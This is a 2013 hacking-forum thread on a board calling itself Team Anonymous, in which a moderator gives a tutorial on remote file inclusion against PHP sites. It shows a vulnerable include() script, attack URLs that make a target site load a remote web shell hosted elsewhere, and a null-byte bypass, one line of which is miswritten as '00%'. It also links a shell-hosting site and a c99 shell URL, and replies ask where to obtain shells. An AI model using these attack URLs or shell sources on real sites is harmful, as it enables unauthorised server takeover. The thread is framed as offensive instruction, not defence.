Team Anonymous
Would you like to react to this message? Create an account in a few clicks or log in to continue.


We are Anonymous, We are legion, We don't forgive, We don't forget, United as one, Divided by zero, Expect us.
 
HomeHome  PortalPortal  Latest imagesLatest images  SearchSearch  RegisterRegister  Log inLog in  
Search
 
 

Display results as :
 
Rechercher Advanced Search
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Control panel

Your profile

Information

Preference

Signature

Avatar

Social

Friends and Foes

Memberlist

Groups

Private messages

Inbox

PM sent

 Other

Topic is being watched

Top posting users this week
No user
Top posters
GeneralChristian
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
lashnelan
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
claves
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
pennbenis
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
fender24
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
jaguar034
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
A-Heroic
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
joemarie
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
Ako Xzi Mhark
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
HattoriHanzo
Web Hacking Method Part 1  I_vote_lcapWeb Hacking Method Part 1  I_voting_barWeb Hacking Method Part 1  I_vote_rcap 
Top posting users this month
No user
Latest topics
» Clash of Clans Get Free Gems using Gift Card
Web Hacking Method Part 1  Emptyby fender24 Tue Oct 13, 2015 7:05 pm

» Clash of Clans
Web Hacking Method Part 1  Emptyby cindy123 Wed Nov 19, 2014 9:23 am

» Winrar Password Remover
Web Hacking Method Part 1  Emptyby cindy123 Wed Nov 19, 2014 9:10 am

» Anti-Deep Freeze
Web Hacking Method Part 1  Emptyby cindy123 Wed Nov 19, 2014 8:04 am

» Ninja Saga ATM Exp + Gold February 2013
Web Hacking Method Part 1  Emptyby airlose2012 Thu Nov 06, 2014 4:45 pm

» Anonymous Daily Attendance !
Web Hacking Method Part 1  Emptyby fender24 Thu Sep 25, 2014 7:53 pm

» Ardamax Keylogger Remover
Web Hacking Method Part 1  Emptyby fender24 Wed Sep 10, 2014 7:50 am

» Free all Premium Accounts 06.09.2014. Uploaded,Depositfiles,Keep2shar,Terafile,Bitshare eand more
Web Hacking Method Part 1  Emptyby claves Sat Sep 06, 2014 2:19 am

» Internet Download Manager 6.15 Full Serial Number
Web Hacking Method Part 1  Emptyby fender24 Fri Aug 22, 2014 7:56 am

» Free all Premium Accounts16.08.2014. Uploaded,Rapidgator,Depositfiles,Keep2share,Novafile,Share-Online,JDownloader2 and more
Web Hacking Method Part 1  Emptyby claves Fri Aug 15, 2014 5:34 pm


Share
 

 Web Hacking Method Part 1

View previous topic View next topic Go down 
AuthorMessage
skyle17
skyle17
Global moderator
Global moderator

Posts : 16
Anonymous Points : 37
Reputation : 1
Join date : 2013-01-23
Location : Anonymous UnderGround

Web Hacking Method Part 1  Empty
PostSubject: Web Hacking Method Part 1    Web Hacking Method Part 1  EmptyWed Jan 30, 2013 5:05 am

Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass

Remote file inclusion

RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method.
1.RFI
Example.
Code:
http://www.site.com/index.php?page=home

2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>

3) Exploiting vulnerability
We have site mga tol
Code:
http://www.target-site.com/index.php?page=home

Now instead of home we gonna use our shell.
So we get:
Code:
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?

If site is vulnerable it should show shell with list of files from site you are attacking.

4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or some other:

Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>

In that case we are gonna use null byte bypass(%00).
Everything after %00 would not count and use.

So link should look like this:
Code:
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?00%

thanks!!
pag nkita nun a vurnerable ang site sa RFI,,,ahmm.
pwede kayung mag hanap ng site na may mga shell..
like c99,at i-47...
pm q sa inio ang site pag active kayu...


here the site of shell

http://www.sh3ll.org/

so u can use
Code:
http://www.sh3ll.org/c99.text?


Last edited by skyle17 on Tue Feb 05, 2013 5:08 am; edited 1 time in total
Back to top Go down
http://www.skyle17.blogspot.com
b7u3h4z3
b7u3h4z3
Leecher

Aquarius
Posts : 7
Anonymous Points : 16
Reputation : 0
Join date : 2013-01-29
Age : 29
Location : 404 Not Found

Web Hacking Method Part 1  Empty
PostSubject: Re: Web Hacking Method Part 1    Web Hacking Method Part 1  EmptyWed Jan 30, 2013 9:07 am

` Where can I find many shells ? Neutral
Back to top Go down
skyle17
skyle17
Global moderator
Global moderator

Posts : 16
Anonymous Points : 37
Reputation : 1
Join date : 2013-01-23
Location : Anonymous UnderGround

Web Hacking Method Part 1  Empty
PostSubject: Shell   Web Hacking Method Part 1  EmptyThu Jan 31, 2013 11:51 am

b7u3h4z3 wrote:
` Where can I find many shells ? Neutral

u can find in the internet,,,but i can give a shell,,,next week i am going to build website an i put the shell u want...wait bro,,,thanks
Back to top Go down
http://www.skyle17.blogspot.com
islandbug
islandbug
Leecher

Cancer
Posts : 4
Anonymous Points : 4
Reputation : 0
Join date : 2013-05-02
Age : 36
Location : Cebu

Web Hacking Method Part 1  Empty
PostSubject: Re: Web Hacking Method Part 1    Web Hacking Method Part 1  EmptyFri May 03, 2013 4:31 am

bro thanks for sharing i want to learn more about your post. its ver interesting
Back to top Go down
Sponsored content




Web Hacking Method Part 1  Empty
PostSubject: Re: Web Hacking Method Part 1    Web Hacking Method Part 1  Empty

Back to top Go down
 

Web Hacking Method Part 1

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Team Anonymous :: Hacking Tutorials :: Exploits / Vulnerabilities-